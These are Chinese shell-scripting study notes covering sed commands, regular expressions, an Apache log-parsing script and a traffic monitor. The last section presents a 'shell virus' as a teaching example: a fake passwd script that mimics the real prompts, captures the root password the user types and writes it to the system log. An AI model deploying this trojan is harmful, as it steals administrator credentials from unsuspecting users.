shell学习笔记五

sed -options 'command' /etc/passwd
cat /etc/passwd | sed -options 'command'

-i <------------------------这个参数可以修改原文件

删除行

# sed -e 'd' /etc/passwd   <-- d 删除行的命令,每处理一行,就执行一次删除行的操作。
# head -5 /etc/passwd | sed -e '1,3d' 删除1到3行
# head -5 /etc/passwd | sed -e '1d;3d'删除第一行和第三行
# head -5 /tmp/test/passwd | sed -e '/root/d' 删除包含root关键字的行
# head -5 /tmp/test/passwd | sed -e '/^root/d' 删除以root开头的行
# head -5 /tmp/test/passwd | sed -e '/nologin$/d'

[root@dns shell_05]# cat /etc/rc.local | sed -e '/^#/d;/^$/d' 删除以#开头或者是空行的行


打印行

# head -5 /tmp/test/passwd  |sed -e '1p'
# head -5 /tmp/test/passwd  |sed -n -e '1p'  注意对比两个命令的区别


[root@dns shell_05]# head -5 /etc/passwd  |sed -n -e '/^root/,/^daemon/p'
root:x:0:0:tanpao,uplooking,124324324,24235454:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin


[root@dns shell_05]# cat /tmp/test/passwd | sed -n -e '/^root/,/^daemon/p'
root:x:0:0:tanpao,uplooking,124324324,24235454:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemonroot:x:2:2:daemon:/sbin:/sbin/nologin
rootlp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sdfsdgdfgdfgfeg
line2
line3
line4
daemon


替换
# cat /tmp/test/passwd | sed -e '1,5s/daemon/@@@@@/g'
# cat /tmp/test/passwd | sed -e 's/line/@@@@@/g'
# cat /tmp/test/passwd | sed -e '1,$s/line/@@@@@/g'
# cat /tmp/test/passwd | sed -e '/^root/,/^bin/s/x/@/'


替换并且修改源文件:
#  sed -i 's/line/@@@@@/g' /tmp/test/passwd 《---不能使用管道
# cat /tmp/test/passwd | sed -e 's/\/sbin\/nologin/\/bin\/false/'


正则表达式

.匹配任意一个字符
*匹配0个或者多个字符
^# 匹配以#开头的
#$ 匹配以#结尾的
[abcd] 匹配a或者b或者c或者d
[^abc] 匹配不包含a或b或c
h{2}  与hh匹配  2代表前面的字符重复2
h{2,3} 与hh或者hhh匹配
h+   匹配至少一个或多个字符h
h*   匹配0或者多个h
h?   匹配0个或者1个h
[a-z] 匹配小写字符
[A-Z] 匹配大写字母
[a-Z] 匹配所有的字母

[:alnum:] 匹配字母和数字
[:blank:] 匹配空格或这个制表符号
[:digit:] 匹配纯数字
[:lower:] 匹配小写字母
[:upper:] 匹配大写字母
[:punct:] 标点符号


===========================================================================================================================================

域:
例子:
[root@qianxin df]# date +%m-%d-%y | sed -e 's/\(.*\)-\(.*\)-\(.*\)/\3-\1-\2/'
将04-13-10变化为10-04-13

[root@qianxin df]# date +%m-%d-%y | sed -r 's/(.*)-(.*)-(.*)/3-1-2/'
将04-13-10变化为10-04-13

# echo 'come on,baby!' | sed -e 's/\(.*\),\(.*\)!/\2,\1!/'
baby,come on!


使用“域”来定位
# date +%m-%d-%Y | sed -e 's/\(.*\)-\(.*\)-\(.*\)/\3-\1-\2/'
2010-04-13
# date +%m-%d-%Y | sed -r 's/(.*)-(.*)-(.*)/\3-\1-\2/'
2010-04-13
 
# echo 'come on,baby!' | sed -e 's/\(.*\),\(.*\)!/\2,\1!/'
baby,come on!

域的匹配是“贪婪”模式
[root@dns shell_05]# echo 'come on,baby,now!' | sed -r 's/(.*),(.*)!/\1/'
come on,baby
[root@dns shell_05]# echo 'come on,baby,now!' | sed -r 's/(.*),(.*),(.*)!/\1/'
come on


删除每行的第一个字符
# cat /etc/fstab | sed -e 's/\(.\)\(.*\)/\2/'

删除每行的第二个字符
# cat /etc/fstab | sed -e 's/\(.\)\(.\)\(.*\)/\1\3/'

删除每行的最后一个字符
# cat /etc/fstab | sed -e 's/\(.*\)\(.\)/\1/'

删除每行的倒数第二个字符
# cat /etc/fstab | sed -e 's/\(.*\)\(.\)\(.\)/\1\3/'


删除第二个单词
# cat /etc/fstab  | sed -r 's/([a-Z]+)([^a-Z]+)([a-Z]+)([^a-Z]+)(.*)/\1\2\4\5/'

删除倒数第二个单词
# cat /etc/fstab | sed -r 's/(.*)([^a-Z]+)([a-Z]+)([^a-Z]+)([a-Z]+)([^a-Z]*$)/\1\2\4\5\6/'

删除最后一个单词
# cat /etc/fstab | sed -r 's/(.*)([^a-Z]+)([a-Z]+)([^a-Z]*$)/\1\2\4/'

=============================================================================================================================================================
例子1:处理apache的日志文件

处理前:
19070 id.zdanswer.cn 220.166.58.80 - - [10/Sep/2009:12:47:56 +0800] "GET /afsunion/xdpsrp.js HTTP/1.1" 200 1674 "http://www.baidu.com/s?dn=http%3A%2F%2Fwww.baidu.com%2Fs&pc=103&ctype=2&wd=97dn.com&tn=13800_pg" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Sicent)"

处理中:
[10/Sep/2009:12:47:56 220.166.58.80 id.zdanswer.cn /afsunion/xdpsrp.js 200 "http://www.baidu.com/s?dn=http%3A%2F%2Fwww.baidu.com%2Fs&pc=103&ctype=2&wd=97dn.com&tn=13800_pg"

处理后:
2009-09-10 12:47:56 220.166.58.80  id.zdanswer.cn /afsunion/xdpsrp.js 200 http://www.baidu.com/s?dn=http%3A%2F%2Fwww.baidu.com%2Fs&pc=103&ctype=2&wd=97dn.com&tn=13800_pg

执行脚本如下:
#!/bin/bash
a=mktemp
awk '{print ($6,$3,$2,$9,$11,$13)}' httpd.log > $a

sed -r 's/^\[//;s/\/Jan\//-01-/;s/\/Feb\//-02-/;s/\/Mar\//-03-/;s/\/Apr\//-04-/;s/\/May\//-05-/;s/\/Jun\//-06-/;s/\/Jul\//-07-/;s/\/Aug\//-08-/;s/\/Sep\//-09-/;s/\/Oct\//-10-/;s/\/Nov\//-11-/;s/\/Dec\//-12-/;s/:/ /;s/([0-9]+)(-[0-9]+-)([0-9]+)(.*)/\3\2\1\4/;s/"//;s/"//' $a
rm -f $a
------------------------------------------------------------------------------------------------------------------------------------------
其他方法:
#!/bin/bash
cat log.txt |awk '{a=substr($6,2,11);b=substr($6,14);c=substr($13,2,length($13)-2);print a,b,$3,$2,$9,$11,c}' > log1.txt


10/Oct/2009 12:47:10 222.209.211.147 id.zdanswer.cn /afsunion/xdpsrp.js 200 http://www.baidu.com/s?dn=http%3A%2F%2Fwww.baidu.com%2Fs&pc=103&ctype=2&wd=%C9%C1%C1%C1%B5%C4%C8%D5%D7%D3+%C2%DE%B4%F3%D3%D3&tn=13800_pg


cat log1.txt |  sed -r 's/(.*)\/(.*)\/(.*) (..):(..):(..) (.*)/\3-\2-\1 \4:\5:\6 \7/;s/Jau/01/;s/Feb/02/;s/Mar/03/;s/Apr/04/;s/May/05/;s/Jun/06/;s/Jul/07/;s/Aug/08/;s/Sep/09/;s/Oct/10/;s/Nov/11/;s/Dec/12/' >log2.txt

 


10/Sep/2009:12:47:10    222.209.211.147 id.zdanswer.cn  /afsunion/xdpsrp.js     200     http://www.baidu.com/s?dn=http%3A%2F%2Fwww.baidu.com%2Fs&pc=103&ctype=2&wd=%C9%C1%C1%C1%B5%C4%C8%D5%D7%D3+%C2%DE%B4%F3%D3%D3&tn=13800_pg

================================================================================================================================================================
例子2:本机流量监控


#!/bin/bash
#例子2:本机流量监控
a=$1
b=$2
c=`cat /proc/net/dev | grep $1 | awk '{print $1}' | awk -F: '{print $2}'`
d=`cat /proc/net/dev | grep $1 | awk '{print $9}'`

while true
do
        recive=`cat /proc/net/dev | grep $1 | awk '{print $1}' | awk -F: '{print $2}'`
        transmit=`cat /proc/net/dev | grep $1 | awk '{print $9}'`
        sleep $2
        break
done
let jin=($recive-$c)/$b
let chu=($transmit-$d)/$b
#echo "$c"
#echo "$d"
#echo "$recive"
#echo "$transmit"
echo "平均接收的流量:'$jin'byte"
echo "平均发送的流量:'$chu'byte"
~                                
=================================================================================================================================================================
例子3:shell病毒--劫持passwd,盗取密码修改信息 (时间允许的话才讲)<--------------------------201004101---passwd.sh---passwd

count=1
if [ -z $1 ];then
        echo "Changing password for user root."
        while true
        read -s -p  "New UNIX password:" passwd1
        echo
        read -s -p  "Retype new UNIX password:" passwd2
        echo
                do
                if [ $passwd1 =  $passwd2 ] ;then
                        echo "passwd: all authentication tokens updated successfully."
                        c=$passwd1
                        break
                elif [ $passwd1 -eq $passwd2 ];then
                        echo "passwd: all authentication tokens updated successfully."
                        c=$passwd1
                        break
                else
                        echo "Sorry, passwords do not match."
                        if [ $count -eq 3 ];then
                                sleep 2
                                echo "passwd: Authentication information cannot be recovered"
                                break
                        else
                                let count++
                                continue
                        fi
                fi
                done
        /bin/echo "$c" | /usr/bin/passwd --stdin root &> /dev/null
        logger -t "passwd for root:" "$c"
else
        /usr/bin/passwd1 $1
fi

 

 

 

 

 

 

 

 

 

 


 

你可能感兴趣的:(shell)